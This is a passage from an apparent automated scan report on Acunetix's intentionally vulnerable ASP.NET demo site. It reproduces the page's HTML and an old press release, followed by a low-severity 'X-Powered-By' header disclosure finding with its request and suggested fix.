8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmNkZGQMFEFD4s6E4+L8NgEI5fU11kxKVg==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKsmpfVDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/sNcuYAa/cRqMvUgVyEWyccHwUIA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        34. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Content-Length: 3745
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (3745 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEF